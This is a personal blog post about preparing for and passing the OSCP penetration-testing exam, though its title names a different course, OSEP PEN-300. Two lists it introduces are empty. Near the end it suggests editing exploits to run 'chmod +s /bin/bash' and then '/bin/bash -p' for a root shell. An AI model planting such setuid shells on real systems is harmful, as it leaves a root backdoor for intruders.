OSEP PEN-300 review - Evasion and Breaching Techniques
You got a reverse shell, but I got a meterpreter shell with antivirus enabled. We are not the same.
As a person who loved the concept of pentesting and how it helps you think in a very different manner aka the ‘attackers mindset”. I couldn’t help but say OSCP is one of the best certifications I took as a beginner into security field. It didnt just teach me the fundamentals to start my career in this field but also taught me alot about time management and concieve a critical thinking ability.
I enrolled into PWK course somewhere in middle of 2020 after graduating from my masters in computer forensics and cyber security. I figured this certification will cement my already existing knowledge and helps me grow further with it.
As not only it served as a learning prospect but also being the beginner certification into pentesting field, I figured this will give me a good leverage for job hunting as well.
If you are a complete beginner into pentesting and OSCP is the direction you want to head, I dont recommend diving right into it, as this course requires you to be well versed in your basic fundamentals of networking and pentesting itself. Some of the other alternatives to start are TryHackMe, HackTheBox, or Immersivelabs.
After completing my lab time, I manage to solve 28 lab machines. I do need mention that PWK has one of the best lab environments to learn and understand things you are doing. It can be regarded as a treasure chest.
With the completion of labs, I did alot of research on resources that were given as suggestions by community members to further practice including TJ_Nulls List. While many people said TJ_Nulls list can be considered one of the best resources, I found it hard to believe as he is an off-sec employee and they aren’t really allowed to give away hints towards their exam so, I decided to just soak my feet completely on Hackthebox machines, IppSec’s methodology on solving HTB machines (He has a great youtube channel for this) also cybermentors ethical hacking and privilege escalation made easy course (This guy is the gandhi of security community id consider, without him life can be a tad tough finding layman teaching)
I also made alot of write-ups using Cherrytree for my own sake as OSCP do require you to submit a full fetched engagement report. This was useful for me cause I could always retrace things I didn’t understand and also revisit methods that I could have possibly forgotten.
Taking notes on how you solve a machine is really a good way to learn as you grasp methodology easier this way, and as you progressively solve more machines, there isn’t really gonna be a way to remember all the exploitation methods without having it stored somewhere and this really helps you during your exam as well. Cheatsheets and personal notes goes a long way in pentesting field.
Due to my timezone and the date of availability to schedule my exam were extremely odd, I started my exam at 3 AM in the morning. It took me roughly 11 hours to hit the passing points with occasional breaks. This is the tough part to swallow. As great as their labs were, their exam is extremely dreadful and tough. It really takes the best out of you due to time management and thinking out of the box under limited time. It took a toll on me during most occasions as I felt I was not able to finish it considering external factors comes into play like tiredness and what not.
After getting the passing points, and coming to report writing I felt if not for the anxiety for exams, this exam could have been a walk in the park.
Don’t be afraid to have your notes and cheatsheets up during your exam, as long as its not the solutions for the machines (lol) you’ll be totally fine and also keeps you not working like a headless chicken.
After submission of my report, I waited for almost 1 month for my results which till today I consider was one of the toughest days of my life. Is something I think back and feel great about myself as it was a pass in my 1st attempt too!
I would like to lastly say, even though OSCP is a beginner certification, but it requires alot of dedication and effort into passing it, it takes the best out of you and that is a great thing which helps you know what you need to know more.
Also as many people don’t really think OSCP is a good way to access people for pentesting jobs as its more CTF styled, I do agree to an extent but also you need to keep in mind, this course isn’t just more so about being a pentester, it also teaches you how to be good at what you do and how to achieve the mindset of thinking out of the box, and I consider these traits to be far more important when you’re molding your career in pentesting. It cements alot of the things and provides you a really good foundation which is almost always credited at work places.
Id like to also state falling into rabbit holes in the exam is extremely common, and this is sometimes a tough situation to be in under restricted time. What I personally like to do is enumerate things and try to check for:
As the goal of OSCP is to submit flag.txt you can do this in many easy and also effective way like:
Editing your exploit code to just read the flag content for you and display it right away or my personal favorite where you can configure exploits with chmod +s /bin/bash and upon successful exploitation you can just /bin/bash -p